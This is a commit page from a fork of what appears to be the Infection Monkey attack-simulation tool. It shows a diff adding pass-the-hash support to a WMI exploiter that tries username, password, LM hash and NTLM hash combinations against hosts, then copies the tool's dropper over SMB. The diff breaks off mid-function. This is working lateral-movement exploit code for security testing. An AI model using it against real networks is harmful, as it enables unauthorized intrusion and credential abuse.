p17860254
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Add pass-the-hash for wmi

This commit is contained in:
Itay Mizeretz 2017-09-27 18:30:44 +03:00
parent 7e3f420fe0
commit d628a27595
1 changed files with 23 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
chaos_monkey/exploit/wmiexec.py
View File

@ -29,34 +29,36 @@ class WmiExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", host) LOG.info("Can't find suitable monkey executable for host %r", host)
return False return False
user_password_pairs = self._config.get_exploit_user_password_pairs() creds = self._config.get_exploit_user_password_or_hash_product()
for user, password in user_password_pairs: for user, password, lm_hash, ntlm_hash in creds:
LOG.debug("Attempting to connect %r using WMI with password '%s'", LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, password) host, user, password, lm_hash, ntlm_hash)
wmi_connection = WmiTools.WmiConnection() wmi_connection = WmiTools.WmiConnection()
try: try:
wmi_connection.connect(host, wmi_connection.connect(host, user, password, None, lm_hash, ntlm_hash)
user,
password)
except AccessDeniedException: except AccessDeniedException:
LOG.debug("Failed connecting to %r using WMI with user,password ('%s','%s')", LOG.debug("Failed connecting to %r using WMI with "
host, user, password) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, user, password, lm_hash, ntlm_hash)
continue continue
except DCERPCException, exc: except DCERPCException as exc:
report_failed_login(self, host, user, password) report_failed_login(self, host, user, password, lm_hash, ntlm_hash)
LOG.debug("Failed connecting to %r using WMI with user,password: ('%s','%s')", LOG.debug("Failed connecting to %r using WMI with "
host, user, password) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, user, password, lm_hash, ntlm_hash)
continue continue
except socket.error, exc: except socket.error as exc:
LOG.debug("Network error in WMI connection to %r with user,password: ('%s','%s') (%s)", LOG.debug("Network error in WMI connection to %r with "
host, user, password, exc) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, user, password, lm_hash, ntlm_hash)
return False return False
except Exception, exc: except Exception as exc:
LOG.debug("Unknown WMI connection error to %r with user,password: ('%s','%s') (%s):\n%s", LOG.debug("Unknown WMI connection error to %r with "
host, user, password, exc, traceback.format_exc()) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",
host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc())
return False return False
host.learn_credentials(user, password) host.learn_credentials(user, password)
@ -77,6 +79,8 @@ class WmiExploiter(HostExploiter):
self._config.dropper_target_path, self._config.dropper_target_path,
user, user,
password, password,
lm_hash,
ntlm_hash,
self._config.smb_download_timeout) self._config.smb_download_timeout)
if not remote_full_path: if not remote_full_path: